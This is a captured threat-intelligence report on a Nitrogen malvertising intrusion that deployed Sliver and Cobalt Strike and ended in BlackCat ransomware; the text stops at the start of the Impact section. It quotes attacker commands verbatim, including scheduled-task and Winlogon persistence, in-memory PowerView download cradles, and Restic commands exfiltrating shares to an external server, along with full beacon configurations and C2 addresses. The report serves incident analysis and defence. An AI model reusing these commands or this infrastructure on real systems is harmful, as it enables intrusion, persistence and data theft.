thedfirreport.com Open in urlscan Pro
2606:4700:3035::6815:950  Public Scan

URL: https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/
Submission: On September 30 via api from IN — Scanned from DE

Form analysis 3 forms found in the DOM

GET https://thedfirreport.com/

<form role="search" method="get" class="search-form" action="https://thedfirreport.com/">
  <label>
    <span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="Search …" value="" name="s">
  </label>
  <input type="submit" class="search-submit" value="Search">
</form>

POST https://wordpress.com/email-subscriptions

<form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="175340963" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog">
  <div class="wp-block-jetpack-subscriptions__form-elements">
    <p id="subscribe-email">
      <label id="subscribe-field-label" for="subscribe-field" class="screen-reader-text"> Type your email… </label>
      <input required="required" type="email" name="email" class="no-border-radius " style="font-size: 16px;padding: 15px 23px 15px 23px;border-radius: 0px;border-width: 1px;" placeholder="Type your email…" value="" id="subscribe-field"
        title="Please fill in this field.">
    </p>
    <p id="subscribe-submit">
      <input type="hidden" name="action" value="subscribe">
      <input type="hidden" name="blog_id" value="175340963">
      <input type="hidden" name="source" value="https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/">
      <input type="hidden" name="sub-type" value="subscribe-block">
      <input type="hidden" name="app_source" value="">
      <input type="hidden" name="redirect_fragment" value="subscribe-blog">
      <input type="hidden" name="lang" value="en_US">
      <input type="hidden" id="_wpnonce" name="_wpnonce" value="404b2af146"><input type="hidden" name="_wp_http_referer" value="/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/"><input type="hidden" name="post_id"
        value="38756"> <button type="submit" class="wp-block-button__link no-border-radius" style="font-size: 16px;padding: 15px 23px 15px 23px;margin: 0; margin-left: 10px;border-radius: 0px;border-width: 1px;" name="jetpack_subscriptions_widget">
        Subscribe <span class="jetpack-memberships-spinner"> <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
            <path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity=".25" fill="currentColor"></path>
            <path d="M10.14,1.16a11,11,0,0,0-9,8.92A1.59,1.59,0,0,0,2.46,12,1.52,1.52,0,0,0,4.11,10.7a8,8,0,0,1,6.66-6.61A1.42,1.42,0,0,0,12,2.69h0A1.57,1.57,0,0,0,10.14,1.16Z" class="jetpack-memberships-spinner-rotating" fill="currentColor"></path>
          </svg></span></button>
    </p>
  </div>
</form>

POST //translate.googleapis.com/translate_voting?client=te

<form id="goog-gt-votingForm" action="//translate.googleapis.com/translate_voting?client=te" method="post" target="votingFrame" class="VIpgJd-yAWNEb-hvhgNd-aXYTce"><input type="text" name="sl" id="goog-gt-votingInputSrcLang"><input type="text"
    name="tl" id="goog-gt-votingInputTrgLang"><input type="text" name="query" id="goog-gt-votingInputSrcText"><input type="text" name="gtrans" id="goog-gt-votingInputTrgText"><input type="text" name="vote" id="goog-gt-votingInputVote"></form>

Text Content

Skip to content
Menu
 * Reports
 * Analysts
 * Services
   * Threat Intelligence
   * Detection Rules
   * DFIR Labs
     * Capture The Flag (CTF)
     * Leaderboard
     * CTF Winners
   * Case Artifacts
   * Mentoring & Coaching Program
     * Book A Session
     * Meet The Team
 * Access DFIR Labs
 * Merchandise
 * Subscribe
 * Contact Us

Menu
 * Threat Intelligence
 * Detection Rules
 * DFIR Labs
   * Capture The Flag (CTF)
   * Leaderboard
   * CTF Winners
 * Mentoring & Coaching Program
   * Book A Session
   * Meet The Team
 * Case Artifacts

The DFIR Report

Real Intrusions by Real Attackers, The Truth Behind the Intrusion


Menu
 * Reports
 * Analysts
 * Services
   * Threat Intelligence
   * Detection Rules
   * DFIR Labs
     * Capture The Flag (CTF)
     * Leaderboard
     * CTF Winners
   * Case Artifacts
   * Mentoring & Coaching Program
     * Book A Session
     * Meet The Team
 * Access DFIR Labs
 * Merchandise
 * Subscribe
 * Contact Us

15:59:12
Monday, September 30, 2024
Menu
 * Threat Intelligence
 * Detection Rules
 * DFIR Labs
   * Capture The Flag (CTF)
   * Leaderboard
   * CTF Winners
 * Mentoring & Coaching Program
   * Book A Session
   * Meet The Team
 * Case Artifacts

blackcat cobaltstrike ransomware sliver


NITROGEN CAMPAIGN DROPS SLIVER AND ENDS WITH BLACKCAT RANSOMWARE

September 30, 2024


KEY TAKEAWAYS

 * In November 2023, we identified a BlackCat ransomware intrusion started by
   Nitrogen malware hosted on a website impersonating Advanced IP Scanner.
 * Nitrogen was leveraged to deploy Sliver and Cobalt Strike beacons on the
   beachhead host and perform further malicious actions. The two
   post-exploitation frameworks were loaded in memory through Python scripts.
 * After obtaining initial access and establishing further command and control
   connections, the threat actor enumerated the compromised network with the use
   of PowerSploit, SharpHound, and native Windows utilities. Impacket was
   employed to move laterally, after harvesting domain credentials.
 * The threat actor deployed an opensource backup tool call Restic on a file
   server to exfiltrate share data to a remote server.
 * Eight days after initial access the threat actor modified a privileged user
   password and deployed BlackCat ransomware across the domain using PsExec to
   execute a batch script.
 * Six rules were added to our Private Ruleset related to this intrusion.

TABLE OF CONTENTS:

 * Case Summary
 * Services
 * Analysts
 * Initial Access
 * Execution
 * Persistence
 * Privilege Escalation
 * Defense Evasion
 * Credential Access
 * Discovery
 * Lateral Movement
 * Collection
 * Command and Control
 * Exfiltration
 * Impact
 * Timeline
 * Diamond Model
 * Indicators
 * Detections
 * MITRE ATT&CK


CASE SUMMARY

The incident began when a user unknowingly downloaded a malicious version of
Advanced IP Scanner from a fraudulent website that mimicked the legitimate one,
leveraging Google ads to rank higher in search results. Analysis of the attack
pattern and loader signature suggests this was part of a Nitrogen campaign,
consistent with previous public reports. The compromised installer came as a ZIP
file, which the victim extracted before launching the embedded executable,
triggering the infection.

The executable was a legitimate Python binary, which side-loaded a modified
Python DLL specifically designed to execute Nitrogen code. This process then
dropped a Sliver beacon in an AppData subfolder named “Notepad.” All malware
deployed during the intrusion was obfuscated using Py-Fuscate to conceal
malicious Python scripts. About eight minutes after the Nitrogen execution, the
attacker initiated hands-on keyboard discovery, utilizing Windows utilities such
as net, ipconfig, and nltest. Two minutes later, additional Sliver beacons were
deployed on the compromised host, with persistence established through scheduled
tasks and registry key modifications.

A little over an hour after the initial execution, the threat actor deployed
additional malware, this time Cobalt Strike beacons, again wrapped in the
Py-Fuscate obfuscation technique. The discovery phase continued with detailed
enumeration of the Active Directory domain, including local and domain
administrators, domain controllers, and computers. To deepen their understanding
of the environment, the attacker utilized tools such as SharpHound and
PowerSploit. The Cobalt Strike beacon was then used to dump domain credentials
from LSASS, granting the attacker local admin credentials with broad access
across the network.

Using the stolen credentials, the threat actor leveraged Impacket’s wmiexec to
move laterally to a server, where they used curl to download a ZIP file
containing their tools. After extracting the archive, they repeated the same
persistence techniques observed on the beachhead, creating scheduled tasks and
modifying registry keys. The attacker then targeted a second server, replicating
the same steps to deploy their tools and maintain persistence. Shortly after, a
second credential dump was performed, again targeting LSASS memory. Following
this, the threat actor began using a domain administrator account, indicating
they likely obtained those credentials during this phase.

The threat actor continued their lateral movement, replicating the same actions
on both a file server and a backup server. Approximately six hours after gaining
initial access, they deployed the open-source backup tool Restic on the file
server. Using Restic, the attacker exfiltrated data from the file shares to a
remote server located in Bulgaria. After this, the hands-on activity
significantly decreased and remained largely silent until the seventh day.

On the seventh day, the threat actor logged into the backup server and accessed
the backup console. No further actions were observed, leading us to assess that
this was likely a discovery effort aimed at understanding the backup
configurations.

On the eighth day, the threat actor shifted to their final objectives. They
identified the domain controllers and used xcopy from their initial lateral
movement server to transfer tools to one of the domain controllers, executing
them remotely via WMIC. Next, they ran a batch script on the domain controller
using PSEXEC, targeting a privileged backup service account, which changed that
accounts credentials. From the staging server, the attacker began distributing
the BlackCat ransomware binary across the network using SMB and the Windows copy
utility. This was followed by executing another batch script via PSEXEC on
multiple remote hosts, initiating the ransomware deployment.

The final script executed a series of actions on remote hosts, including
configuring them to start in Safe Mode with Networking and setting a registry
run key to launch the ransomware binary upon reboot. It also set the compromised
backup service account to auto login using Winlogon, and then forced a system
reboot. As a result, the hosts rebooted into Safe Mode, where the ransomware was
automatically executed. This led to file encryption across the affected systems,
with the ransomware leaving a note on each host. The Time to Ransomware (TTR)
was approximately 156 hours, spanning over eight calendar days.

If you would like to get an email when we publish a new report, please subscribe
here.


THE DFIR REPORT SERVICES



 * Private Threat Briefs: Over 20 private DFIR reports annually.
 * Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt
   Strike, Metasploit, Sliver, etc.
 * All Intel: Includes everything from Private Threat Briefs and Threat Feed,
   plus private events, opendir reports, long-term tracking, data clustering,
   and other curated intel.
 * Private Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases,
   mapped to ATT&CK with test examples.
 * DFIR Labs: Offers cloud-based, hands-on learning experiences, using real
   data, from real intrusions. Interactive labs are available with different
   difficulty levels and can be accessed on-demand, accommodating various
   learning speeds.



Contact us today for pricing or a demo!


ANALYSTS

Analysis and reporting completed by Angelo Violetti, @0xtornado (Linkedin) and

@v3t0_.

.


INITIAL ACCESS

DRIVE-BY COMPROMISE

Based on threat intelligence sources and the file name, we are highly confident
that the threat actors accessed the victim’s infrastructure through a Nitrogen
campaign, which delivered a ZIP file via malicious Google ads (i.e.,
malvertising).

Nitrogen is known for leveraging legitimate utilities like Advanced IP Scanner,
Putty, etc. to conceal malware. The following graph shows the Nitrogen infection
chain and how it executed Sliver.



The ZIP file named Version.zip contained mainly:

 * a legitimate Python executable named setup.exe which was run by the victim.
 * two hidden Python DLLs.



Upon execution of Setup.exe, the following actions were performed:

 * The hidden python311.dll was loaded (DLL sideloading) and the Nitrogen code
   was launched.
 * A legitimate copy of Advanced IP Scanner was copied into the
   %Public%\Downloads folder.
 * python.exe, pycryptodome, and a Sliver beacon were placed into a folder named
   %AppData%\Notepad.
 * The Sliver beacon was executed through a Python script named slv.py which
   decrypts an AES-encrypted DLL (data.aes) and loads it into memory.
 * Advanced IP Scanner was installed in the compromised system.

A very similar campaign was reported by @dipotwb on Twitter. We also observed
overlap with campaigns reported by Esentire.




EXECUTION

A few minutes later, the threat actor deployed Python scripts on the beachhead,
serving as loaders for both Sliver and Cobalt Strike.



The following image shows the sequence of beacons executed on the beachhead
host.



SLIVER

The Python script, slv.py, used to load Sliver into memory, was heavily
obfuscated. However, buried within thousands of lines of code was the critical
section responsible for executing the Sliver beacon.



Based on the analysis of these artifacts, it appears the Sliver payload was
likely obfuscated using Py-Fuscate, as the tool’s encode function mirrored the
same imports and procedures found in the obfuscated script, effectively
concealing the malicious code.



The Sliver execution revealed multiple interesting debugging strings. In the
first instance, Windows API functions’ addresses are resolved.



Subsequently, the Sliver DLL is injected in memory and the DLL entrypoint is
called.



Those debugging strings are the same ones used by Pyramid in the
pythonmemorymodule which is a module used to inject and execute DLLs in memory.



By analyzing the Python.exe process memory, it was possible to notice the DLL
injected in the memory sections previously described in the debugging strings.





The Sliver DLL exports multiple functions, however, StartW is the one to run the
beacon.



Multiple strings related to Sliver were found in the process memory.



COBALT STRIKE

wo14.py is another highly obfuscated Python script that acts as a loader for
custom shellcode. In this specific case, the threat actor specified an
AES-encrypted Cobalt Strike shellcode which is:

 * Decrypted through the key “we3p2v5t85”.
 * Copied into a newly allocated memory region in the Heap.
 * Executed by invoking the function CreateThread.



wo12.py has the same behavior.



The Sysmon Event ID 10 shows the self-injection technique performed by the
Python Cobalt Strike loader.




PERSISTENCE

SCHEDULED TASK

During the intrusion, the threat actor created multiple scheduled tasks to
achieve persistence. This persistence technique was abused on the beachhead host
and each host moved to laterally during the first day.

schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks /create /I 1 /TR C:\Users\REDACTED\AppData\Local\Notepad\UpdateEG.bat /TN UpdateEdge /SC ONIDLE


However, some of them had mistakes and therefore were not correctly working.

For example, in the following task, the threat actor didn’t specify the “\”
between “C:” and the executable name.

schtasks /create /I 1 /TR C:WindowsTempUpdate.exe /TN UpdateEdge /SC ONIDLE




While some tasks used the ‘ONSTART’ option to enable persistence after reboot,
some used a time frame to execute every 720 minutes. For example, on a server
the threat actor dropped a BAT file name UpdateEdge.bat and subsequently created
two scheduled tasks using this option.





REGISTRY KEY

To ensure persistence on the beachhead host and three servers, the threat actor
added an entry in the Winlogon\Userinit registry key to ensure the execution of
UpdateEdge.bat whenever a user logs into the systems.

cmd.exe /C reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe,c:\users\[REDACTED]\appdata\local\notepad\UpdateEdge.bat


 


PRIVILEGE ESCALATION

On the beachhead system, the initial payload setup.exe was executed with High
integrity level, which means that the binary was run with the access level
equivalent to Administrator access.



An injected cmd.exe process from the beachhead host opened winlogon.exe with an
access mask of 0x143A, which, when decoded, revealed the PROCESS_VM_WRITE
permission. The cmd.exe process then executed process injection into
winlogon.exe.





All scheduled tasks created by the threat actor were setup to run in SYSTEM
context ensuring that access would stay elevated on hosts.




DEFENSE EVASION

NITROGEN

By analyzing the modified Python DLL (python311.dll), we notice multiple defense
evasion functionalities implemented, such as:

 * Removing hooks from Windows API functions.
 * Obfuscating the payload in memory (i.e., Sleep Obfuscation).
 * Bypassing AMSI, WLDP, and ETW.

Based on code overlaps, those techniques could have been copied from the
following GitHub repositories:

 * Antimalware-Research/Generic/Userland Hooking/AntiHook at master ·
   NtRaiseHardError/Antimalware-Research · GitHub
 * GitHub – RtlDallas/KrakenMask: Sleep obfuscation
 * donut/loader/bypass.c at master · TheWover/donut · GitHub
 * Patching WLDP · GitHub



An example of code overlap is showed in the following image related to the
IsHooked() function.



MASQUERADING

With the aim to conceal the malicious activities into normal system events, the
threat actor masqueraded both the initial payload and the persistence mechanisms
by:

Renaming python.exe to setup.exe.



Naming the scheduled tasks to mirror OneDrive and Microsoft Edge.



Renaming python executable used for executing their python stagers for Sliver
and Cobalt Strike.






PROCESS INJECTION

The threat actor was observed injecting into various processes during the
intrusion. One specific occasion was during the elevation to SYSTEM on the
beachhead host.




CLEARING LOGS

Execution of the ransomware payload included clearing of various event logs
while the hosts were in safe mode.




SAFEBOOT

Before executing the final ransomware the threat actor set all hosts to restart
in safe mode with networking. This can be used to prevent antivirus or other
preventative tools from stopping the ransom execution as many won’t start when a
host is booted in safe mode. It has been used by several ransomware families.




CREDENTIAL ACCESS

Two hours after initial access, the threat actor utilized Cobalt Strike’s
credential dumping functionalities to access the LSASS process on the beachhead
host. This provided them access to a shared local administrator account. Around
two hours after that they landed on a server during lateral movement activity,
the threat actor was seen accessing LSASS. After this we observed the use of a
domain administrator account indicating this second access likely delivered
those credentials.



 


DISCOVERY

SLIVER

A few minutes after its execution, Sliver launched the following commands to
enumerate:

 * Local and domain admins.
 * Domain computers.
 * Active Directory trusts.
 * Network adapters.

net group "domain admins" /domain
ipconfig /all
nltest /domain_trusts
net localgroup administrators
net group "Domain Computers" /domain


COBALT STRIKE

As with Sliver, Cobalt Strike was utilized to perform hands-on keyboard
discovery activities.

cmd.exe /C net group "Domain controllers" /DOMAIN
cmd.exe /C net group "domain admins" /DOMAIN
cmd.exe /C net localgroup Administrators
cmd.exe /C net group /Domain
cmd.exe /C net group "Domain Computers" /DOMAIN


POWERVIEW

On the beachhead host, the threat actor loaded in memory PowerView to perform
further discovery activities. This specific action was identified through
PowerShell Script Block Logging.



PowerView was used to:

 * Gather the local admins.

IEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread 50


 * Extract the servers in the environment.

IEX (New-Object Net.Webclient).DownloadString('http://localhost:54350/'); Get-DomainComputer -OperatingSystem '*server*' -Properties 'name,operatingsystem,operatingsystemversion,lastlogontimestamp,dnshostname' -Ping >> srv.txt


BLOODHOUND

The $MFT showed also that in the first phases of the intrusion, the threat actor
performed a BloodHound collection to likely identify paths to escalate
privileges to domain admin.




LATERAL MOVEMENT

REMOTE DESKTOP PROTOCOL

On the first day of the intrusion, four hours after the Nitrogen execution, the
threat actor started interacting with other systems such as a file server
through a Cobalt Strike beacon which was injected into winlogon.exe.



WINDOWS MANAGEMENT INSTRUMENTATION (WMI)

Four hours after initial access, the threat actor moved laterally to a server
using Impacket’s wmiexec and downloaded a ZIP file containing Python and a
Cobalt Strike beacon (wo12.py and wo14.py ).






PASS THE HASH

During the intrusion we observed three instances of possible pass-the-hash
activity in the logs. These involved instances where the threat actor appear to
be moving from the SYSTEM context to a domain administrator account.




SMB ADMIN SHARES

While some of the threat actor’s payloads were downloaded from a remote resource
they also at times transferred their tooling laterally using SMB, and then
executed using WMIC or wmiexec.




COMMAND AND CONTROL

Over the course of the intrusion the threat actor relied on Sliver and Cobalt
Strike. Sliver was used most heavily during the first day of the intrusion with
Cobalt Strike then being used over the full length of the intrusion.





COBALT STRIKE

IP Port Ja3 Ja3s ASN Org ASN Country 91.92.250.65 443
72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7 LIMENET
394,711 Bulgaria 91.92.250.60 443 72a589da586844d7f0818ce684948eea
f176ba63b4d68e576b5ba345bec2c7b7 LIMENET 394,711 Bulgaria

wo14.py Cobalt Strike configuration.

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 38500
MaxGetSize                       - 13982519
Jitter                           - 27
MaxDNS                           - Not Found
PublicKey_MD5                    - 1329384dfdcfde2228da94e2a042f2b4
C2Server                         - 91.92.250.65,/broadcast
UserAgent                        - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
HttpPostUri                      - /1/events/com.amazon.csm.csa.prod
Malleable_C2_Instructions        - Remove 1308 bytes from the end
                                   Remove 1 bytes from the end
                                   Remove 194 bytes from the beginning
                                   Base64 decode
HttpGet_Metadata                 - ConstHeaders
                                        Accept: application/json, text/plain, */*
                                        Accept-Language: en-US,en;q=0.5
                                        Origin: https://www.amazon.com
                                        Referer: https://www.amazon.com
                                        Sec-Fetch-Dest: empty
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Site: cross-site
                                        Te: trailers
                                   Metadata
                                        base64
                                        header "x-amzn-RequestId"
HttpPost_Metadata                - ConstHeaders
                                        Accept: */*
                                        Origin: https://www.amazon.com
                                   SessionId
                                        base64url
                                        header "x-amz-rid"
                                   Output
                                        base64url
                                        prepend "{"events":[{"data":{"schemaId":"csa.VideoInteractions.1","application":"Retail:Prod:,"requestId":"MBFV82TTQV2JNBKJJ50B","title":"Amazon.com. Spend less. Smile more.","subPageType":"desktop","session":{"id":"133-9905055-2677266"},"video":{"id":""
                                        append ""
"
                                        append ""playerMode":"INLINE","videoRequestId":"MBFV82TTQV2JNBKJJ50B","isAudioOn":"false","player":"IVS","event":"NONE"}}}}]}"
                                        print
PipeName                         - Not Found
DNS_Idle                         - Not Found
DNS_Sleep                        - Not Found
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
SSH_Password_Pubkey              - Not Found
SSH_Banner                       -
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\gpupdate.exe
Spawnto_x64                      - %windir%\sysnative\gpupdate.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark_Hash                   - 3Hh1YX4vT3i5C7L2sn7K4Q==
Watermark                        - 587247372
bStageCleanup                    - True
bCFGCaution                      - True
KillDate                         - 0
bProcInject_StartRWX             - True
bProcInject_UseRWX               - False
bProcInject_MinAllocSize         - 16700
ProcInject_PrependAppend_x86     - b'\x90\x90\x90'
                                   Empty
ProcInject_PrependAppend_x64     - b'\x90\x90\x90\x90\x90\x90\x90\x90\x90'
                                   Empty
ProcInject_Execute               - ntdll.dll:RtlUserThreadStart
                                   SetThreadContext
                                   NtQueueApcThread-s
                                   kernel32.dll:LoadLibraryA
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - NtMapViewOfSection
bUsesCookies                     - False
HostHeader                       -
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - round-robin
DNS_strategy_rotate_seconds      - -1
DNS_strategy_fail_x              - -1
DNS_strategy_fail_seconds        - -1
Retry_Max_Attempts               - 0
Retry_Increase_Attempts          - 0
Retry_Duration                   - 0


wo12.py Cobalt Strike configuration.

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 38500
MaxGetSize                       - 13982519
Jitter                           - 27
MaxDNS                           - Not Found
PublicKey_MD5                    - f27a9b7c29960aaf911f2885b40536c2
C2Server                         - 91.92.250.60,/broadcast
UserAgent                        - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
HttpPostUri                      - /1/events/com.amazon.csm.csa.prod
Malleable_C2_Instructions        - Remove 1308 bytes from the end
                                   Remove 1 bytes from the end
                                   Remove 194 bytes from the beginning
                                   Base64 decode
HttpGet_Metadata                 - ConstHeaders
                                        Accept: application/json, text/plain, */*
                                        Accept-Language: en-US,en;q=0.5
                                        Origin: https://www.amazon.com
                                        Referer: https://www.amazon.com
                                        Sec-Fetch-Dest: empty
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Site: cross-site
                                        Te: trailers
                                   Metadata
                                        base64
                                        header "x-amzn-RequestId"
HttpPost_Metadata                - ConstHeaders
                                        Accept: */*
                                        Origin: https://www.amazon.com
                                   SessionId
                                        base64url
                                        header "x-amz-rid"
                                   Output
                                        base64url
                                        prepend "{"events":[{"data":{"schemaId":"csa.VideoInteractions.1","application":"Retail:Prod:,"requestId":"MBFV82TTQV2JNBKJJ50B","title":"Amazon.com. Spend less. Smile more.","subPageType":"desktop","session":{"id":"133-9905055-2677266"},"video":{"id":""
                                        append ""
"
                                        append ""playerMode":"INLINE","videoRequestId":"MBFV82TTQV2JNBKJJ50B","isAudioOn":"false","player":"IVS","event":"NONE"}}}}]}"
                                        print
PipeName                         - Not Found
DNS_Idle                         - Not Found
DNS_Sleep                        - Not Found
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
SSH_Password_Pubkey              - Not Found
SSH_Banner                       -
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\gpupdate.exe
Spawnto_x64                      - %windir%\sysnative\gpupdate.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark_Hash                   - 3Hh1YX4vT3i5C7L2sn7K4Q==
Watermark                        - 587247372
bStageCleanup                    - True
bCFGCaution                      - True
KillDate                         - 0
bProcInject_StartRWX             - True
bProcInject_UseRWX               - False
bProcInject_MinAllocSize         - 16700
ProcInject_PrependAppend_x86     - b'\x90\x90\x90'
                                   Empty
ProcInject_PrependAppend_x64     - b'\x90\x90\x90\x90\x90\x90\x90\x90\x90'
                                   Empty
ProcInject_Execute               - ntdll.dll:RtlUserThreadStart
                                   SetThreadContext
                                   NtQueueApcThread-s
                                   kernel32.dll:LoadLibraryA
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - NtMapViewOfSection
bUsesCookies                     - False
HostHeader                       -
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - round-robin
DNS_strategy_rotate_seconds      - -1
DNS_strategy_fail_x              - -1
DNS_strategy_fail_seconds        - -1
Retry_Max_Attempts               - 0
Retry_Increase_Attempts          - 0
Retry_Duration                   - 0


The two Cobalt Strike C2 showed the classic HTTP response related to the
post-exploitation framework:

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Day, DD Mmm YYYY HH:MM:SS GMT
Content-Length: 0





By diving deeper into the two command and control servers, it was noticed that
both of them exposed the HTTP service on port 81 with the following HTTP
response.



Therefore, the following FOFA query was built to identify further potential C2
servers matching this pattern.

"HTTP/1.1 307 Temporary Redirect" && "Content-Type: text/html; charset=utf-8" && "Location: https://www.cloudflare.com/" && "Content-Length: 63" && port="81" && protocol="http"


Some of the first results provided by FOFA via the above-mentioned query were
reported by Rapid7 in one of their latest blog posts.



Based on FOFA results, all the identified command and control servers were in
Bulgaria and the Netherlands.

IP Country 91.92.240.175 BG 91.92.240.194 BG 91.92.241.117 BG 91.92.242.182 BG
91.92.242.39 BG 91.92.242.55 BG 91.92.245.174 BG 91.92.245.175 BG 91.92.247.123
BG 91.92.247.127 BG 91.92.249.110 BG 91.92.250.148 BG 91.92.250.158 BG
91.92.250.60 BG 91.92.250.65 BG 91.92.250.66 BG 91.92.251.240 BG 94.156.67.175
BG 94.156.67.180 BG 94.156.67.185 BG 94.156.67.188 BG 141.98.6.195 NL
193.42.33.14 NL 194.180.48.165 NL 194.180.48.42 NL 194.49.94.21 NL 194.49.94.22
NL

Furthermore, we noticed that four IP addresses (91.92.250.158, 91.92.251.240,
94.156.67.175, 94.156.67.180) had an untrusted certificate on port 441 with
protocol HTTPS associated with Alibaba, when they were active Cobalt Strike
servers.



The certificate serial number (1657766544761773100) was used to identify other
possibly used by the same threat actors, and further servers were detected which
showed a behavior similar to what was previously described. For example, the IP
address 185.73.124.238 shares the same certificate and is, at the time of report
writing, an active Cobalt Strike C2 server.



As described in a Hunt.io blog post, these specific certificate attributes like
CommonName and Organization are associated with the usage of RedGuard which is a
C2 redirector.



SLIVER

IP Port Ja3 Ja3s ASN Org ASN Country 194.49.94.18 8443
19e29534fd49dd27d09234e639c4057e f4febc55ea12b31ae17cfb7e614afda8 Matrix Telecom
Ltd 216,419 The Netherlands 194.169.175.134 8443
d6828e30ab66774a91a96ae93be4ae4c f4febc55ea12b31ae17cfb7e614afda8 Matrix Telecom
Ltd 216,419 The Netherlands

Both the Sliver servers 194.49.94[.]18 and 194.169.175[.]134 had invalid
certificates on port 8443.






EXFILTRATION

The threat actor used Restic, a backup utility to exfiltrate directories
directly from a file server. Below are the commands used by the threat actor to
initiate the backup repository and exfiltrate the data:

restic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt
restic.exe -r rest:http://195.123.226.84:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup "F:\Shares\<REDACTED>\<REDACTED>"


The threat actor exfiltrated the data over HTTP to server hosted on
195.123.226[.]84 . The different parameters used by the threat actor are:

 * “-r rest”: The -r option is used to specify the location of the repository
   where the backup data will be stored, this can be anything from an S3 bucket
   to a SFTP server. In this case, the Threat Actor used a REST server.
 * “–password-file”: This option grabs the backup password from a file, in this
   case ppp.txt
 * “–use-fs-snapshot”: This option will use the Windows’ Volume Shadow Copy
   Service (VSS) for creating backups. Restic, according the the documentation,
   will transparently create a VSS snapshot for each volume that contains files
   to backup. Files are read from the VSS snapshot instead of the regular
   filesystem. This allows to backup files that are exclusively locked by
   another process during the backup.
 * “–verbose”: This option is used to print a live status of the backup or the
   processed files.

The traffic related to this activity triggered the following Suricata alert: ET
USER_AGENTS Go HTTP Client User-Agent . Investigating the Suricata EVE flow logs
would reveal the usage of Restic thanks to the Content-Type HTTP header:

http: {
protocol: "HTTP/1.1",
http_content_type: "application/vnd.x.restic.rest.v2"
}



IMPACT

The threat actor dropped and executed two batch scripts, up.bat and 1.bat,
